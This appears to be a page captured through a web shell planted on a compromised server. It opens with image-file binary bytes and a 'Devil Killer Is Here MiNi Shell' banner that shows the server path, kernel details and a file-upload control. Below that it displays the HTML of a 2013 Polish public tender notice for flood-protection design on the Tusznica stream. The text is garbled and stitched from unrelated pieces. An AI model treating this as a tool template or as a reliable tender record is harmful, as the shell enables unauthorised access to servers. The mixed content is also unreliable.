JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/44628-N-2013.html

<p class="kh_header"><b>Kraków: Opracowanie dokumentacji projektowo-kosztorysowej  dla przedsięwzięcia pn.: 
ZABEZPIECZENIE PRZECIWPOWODZIOWE DLA POTOKU TUSZNICA W GMINIE KŁAJ, POWIAT WIELICKI</b><br>
<b>Numer ogłoszenia: 44628 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej  dla przedsięwzięcia pn.: 
ZABEZPIECZENIE PRZECIWPOWODZIOWE DLA POTOKU TUSZNICA W GMINIE KŁAJ, POWIAT WIELICKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej  dla zadania pn.:
ZABEZPIECZENIE PRZECIWPOWODZIOWE DLA POTOKU
TUSZNICA W GMINIE KŁAJ, POWIAT WIELICKI 
Zadanie 1-  Budowa suchego zbiornika w km 5+168 potoku Tusznica 
w gm. Kłaj, pow. wielicki
Zadanie 2 - Regulacja potoku Tusznica od km 0+000 do km 4+654 
w gm. Kłaj, pow. Wielicki
Zamówienie obejmuje również przygotowanie i skuteczne złożenie wniosku o pozwolenie na realizację inwestycji zgodnie z wymogami ustawy z 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U.z 2010r. nr 143 poz. 963).dla cz.1 oraz  przygotowanie i skuteczne złożenie wniosku o pozwolenie na budowę i zgłoszenia przebudowy infrastruktury technicznej zgodnie z wymogami  ustawy z dnia 7 lipca 1994 r.  Prawo budowlane dla  cz.2.
Zamówienie obejmuje wykonanie projektów budowlanych w oparciu                     o Koncepcję wykonaną w grudniu 2012 r  przez Biuro Olbrycht - Malik,                                       ul. Gen. W. Urbanowicza  10a, 31-802 Kraków -załącznik do SIWZ lub materiały do wglądu w siedzibie zamawiającego ul. Kraszewskiego 36  Kraków
 Obowiązkiem Wykonawcy jest przeprowadzenie wizji lokalnej w terenie oraz uzyskanie, na swoją odpowiedzialność i ryzyko, wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca dokona na swój koszt.
 

2. Opracowanie  obejmuje:
dla Zadania 1-  Budowa suchego zbiornika w km 5+168 potoku Tusznica
 w gm. Kłaj, pow. wielicki

1. Projekt budowlany 5 egz. w wersji papierowej + 1egz w wersji elektronicznej  oraz pozostałe elementy niezbędne do wniosku  spełniającego wymogi ustawy   z dnia 8 lipca 2010 r o szczególnych zasadach przygotowania do realizacji inwestycji (zg. z art.6.1 w.w ustawy) wraz z uzyskaniem w imieniu inwestora wszystkich poprzedzających a wymaganych przepisami opinii, prawomocnych decyzji ,sprawdzeń i uzgodnień ,zatwierdzeń dokumentacji projektowej wraz z przygotowaniem i skutecznym złożeniem wniosku o pozwolenie na realizacje inwestycji w tym wykonanie między innymi :
A. Jednostkowych operatów wstępnego podziału działek - po 6 egz. w wersji papierowej+1 egz. w  wersji elektronicznej, 
2.Projekt wykonawczy 4 egz. w wersji papierowej + 1 egz. w wersji elektronicznej
3.przedmiar robót - 5 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
4.kosztorys inwestorski - 2 egz. w wersji papierowej
5.STWiORB-5 egz. w wersji papierowej +1 egz. w wersji elektronicznej
6.Informacja o BIOZ- 5 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
7. Scalony przedmiar robót- 5 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
8.operat wodnoprawny - 2 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
9. operat dendrologiczny-2 egz. w wersji papierowej+1 egz. w wersji elektronicznej edytowanej
B. Zbiorczej mapy podziału nieruchomości dla wykonanych jednostkowych projektów podziału działek wraz z zachowaniem ciągłości zakresu działek pozostałych tj. nie objętych projektami podziału a wchodzącymi w zakres zadania wraz ze sporządzeniem geodezyjnej dokumentacji podziału nieruchomości (projekty podziału sporządzone w trybie ustawy z 8 lipca 2010r.o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych).Materiały geodezyjne należy opracować zgodnie z obowiązującymi instrukcjami geodezyjnymi, Ustawą Prawo Geodezyjne i Kartograficzne, oraz Ustawą o gospodarce nieruchomościami. - 6 egz. w wersji papierowej +1 egz. w wersji elektronicznej
C. Pozyskanie wszelkich  decyzji administracyjnych niezbędnych do rozpoczęcia robót budowlanych 

3. Opracowanie  obejmuje:
 dla Zadanie 2 - Regulacja potoku Tusznica od km 0+000 do km 4+654 w gm. Kłaj, pow. wielicki
4.1. Projekt budowlany 5 egz. w wersji papierowej + 1egz w wersji elektronicznej  oraz dokumenty zgłoszeniowe  spełniające wymogi ustawy   z dnia 7 lipca 1994r Prawo budowlane wraz z uzyskaniem w imieniu inwestora wszystkich poprzedzających a wymaganych przepisami opinii, prawomocnych decyzji sprawdzeń i uzgodnień ,zatwierdzeń dokumentacji projektowej wraz z przygotowaniem i skutecznym złożeniem wniosku (zgłoszeń) o wydanie decyzji pozwolenia na budowę pozwolenie na realizacje inwestycji 
 
4.2.Wykonanie podziału działek i  pozyskanie w imieniu inwestora   decyzji ustalającej linię brzegową potoku Tusznica - 5 egz. wersji papierowej + 1 egz. wersji elektronicznej, 

4.3. Operat dendrologiczny - 2 egz.  w wersji papierowej+1 egz. w wersji elektronicznej edytowanej
4.4.Projekty wykonawcze po  4 egz. w wersji papierowej i po1 egz. w wersji elektronicznej
4.5.przedmiar robót - 5 egz wersji papierowej +1 egz w wersji elektronicznej
4.6.kosztorys inwestorski - 2 egz. w wersji papierowej
4.7.STWiORB-5 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
4.8.Informacja o BIOZ- 5 egz. w wersji papierowej+1 egz. w wersji elektronicznej edytowanej
4.9. Scalony przedmiar robót- 5 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
4.10.operat wodnoprawny - 2 egz. w wersji papierowej +1 egz. w wersji elektronicznej edytowanej
4.11. operat dendrologiczny - 2 egz.  w wersji papierowej+1 egz. w wersji elektronicznej edytowanej

4.Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna być ona opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć; informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych; 

5. Planowany zakres prac projektowych objętych zamówieniem 
wg Koncepcji z grudnia 2012r  wykonanej przez Biuro Olbrycht - Malik,                                       ul. Gen. W. Urbanowicza  10a, 31-802 Kraków- wariant 2
Zadanie 1.Budowa suchego zbiornika w km 5+168 potoku Tusznica                      w gm. Kłaj, pow. wielicki 
Zapora w km 5+168
Parametry zapory
Klasa budowli IV
Qm=Q1% 6,89 m3/s
Qk =Q0.5% 7,99 m3/s
Wysokość zapory 6.5 m
Długość zapory 202 m
Rzędna korony zapory 225.70 m n.p.m.
Nachylenie skarpy odwodnej 1:3
Nachylenie skarpy odpowietrznej 1:2,5
Kubatura nasypu zapory ~9 500 tys. m3
Parametry zbiornika
Rzędna Max PP 225,00 m n.p.m.
Powierzchnia zalewu przy Max PP 9,9 ha
Pojemność powodziowa 145 tys. m3
Przy tak przyjętej rzędnej Max PP w celu ograniczenia zasięgu zwierciadła wody konieczna będzie przebudowa ogrodzeń dwóch posesji, zlokalizowanych w sąsiedztwie cofki zbiornika oraz zabezpieczenie podstawy słupa wysokiego napięcia, zlokalizowanego przy prawym przyczółku zapory . Przyjęcie odpowiedniego rozwiązania powinno odbyć się w fazie projektu budowlanego.
Zadanie 2. Regulacją potoku Tusznica od km 0+000 do km 4+654 w gm. Kłaj, pow. wielicki
Sekcja I - km 0+000 ÷ 0+700
Przekrój trapezowy o szerokości dna 1,8 m i nachyleniu skarp 1:1.5. Dno oraz skarpy ubezpieczone płytami ażurowymi typu mała krata.
Sekcja II - km 0+700 ÷ 3+000 
zabudowa koryta potoku w postaci żłobu betonowego z okładziną kamienną. Szerokość żłobu w dnie wynosi 2,8 m i nachylenie ścian 4:1. Maksymalna głębokość koryta wyniesie 1,8 m. Maksymalne napełnienie w korycie o takich parametrach i przy założonym spadku podłużnym i=2,8pr, dla wody miarodajnej Q1% wynosi 1,57m z uwzględnieniem przechyłki na łukach.
W obrębie sekcji II zlokalizowanych jest 21 przejazdów (mostków), 5 kładek i 2 mosty drogowe. Wszystkie przejazdy i kładki ze względu na zbyt małe światło poziome spiętrzają wody powodziowe podczas wezbrań. Dlatego też przewiduje się przebudowę wszystkich przejazdów i kładek w obrębie sekcji II. Przebudowa polegać będzie na wzmocnieniu murów żłobu na długości przejazdu oraz na zabudowie płyty żelbetowej opartej na tych murach. W ten sposób przejazdy pozostaną poza zasięgiem zwierciadła wody miarodajnej Q1% i nie będą wpływać na poziom zwierciadła wody w korycie potoku. Oprócz przebudowy  przejazdów i kładek regulacja w obrębie sekcji II wymaga przebudowy sieci uzbrojenia podziemnego i napowietrznych linii energetycznych i teletechnicznych. Biegnące wzdłuż koryta potoku drogi gminne również będą wymagały naprawy i odbudowy. Również istniejąca zabudowa, a zwłaszcza budynki gospodarcze zlokalizowane zbyt blisko koryta potoku będą musiały zostać rozebrane w całości lub częściowo. Dla wariantu nr 2 budynków tych będzie 9.
Sekcja III - km 3+000 ÷ 4+654
 Przekrój trapezowy o szerokości dna 0,5 m i nachyleniu skarp 1:1.5. Dno koryta zostanie umocnione korytkiem betonowym w postaci prefabrykatu Hałcnów natomiast skarpy ubezpieczone zostaną płytami ażurowymi typu mała krata..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 90.70.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie ,że Wykonali  co najmniej  1 dokumentację projektową dotyczącą budowy suchego zbiornika o wartości nie mniejszej niż 130 tys. zł. oraz 1 dokumentację projektową dotyczącą   regulacji  rzek i potoków o wartości nie mniejszej niż 130 tys. zł. ,z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą ,że dysponują lub będą dysponować osobami posiadającymi kwalifikacje zawodowe, doświadczenie i uprawnienia  konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) lub  odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. Nr 5,poz.42 z późn.zm.) na stanowisku projektanta posiadającą uprawnienia o specjalności konstrukcyjno-budowlanej do projektowania w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych  składając stosowne oświadczenie. 
W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394 ze zm.)
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli: są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. , przedłoży opłacone ubezpieczenie-z dowodem wpłaty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Zaakceptowany projekt umowy 3. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 4. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 5.Oświadczenie zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. 6.Oświadczenie , że nie podlega wykluczeniu na podstawie przesłanek zawartych w art 24 ust 1-2 7. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 8. W przypadku osób fizycznych oświadczenie, że wyrażają zgodę na uczestnictwo w realizacji przedmiotu zamówienia po stronie Wykonawcy.9.Formularz cenowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany postanowień niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnej pod rygorem nieważności (aneks). 
2.	Z zastrzeżeniem formy przewidzianej w ust. 1, Strony dopuszczają możliwość zmiany postanowień umowy w następujących przypadkach:
a)	zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG)  w trakcie realizacji zamówienia;
b)	zmiany kont bankowych,
c)	wystąpienia oczywistych omyłek pisarskich  i rachunkowych w treści umowy.
d)	w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób,  aby wynikająca z umowy cena netto pozostała niezmieniona
e)	  zmian regulacji prawnych obowiązujących w dniu podpisania  umowy lub po jej podpisaniu
zmiany harmonogramu rzeczowo - finansowego w sytuacji wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
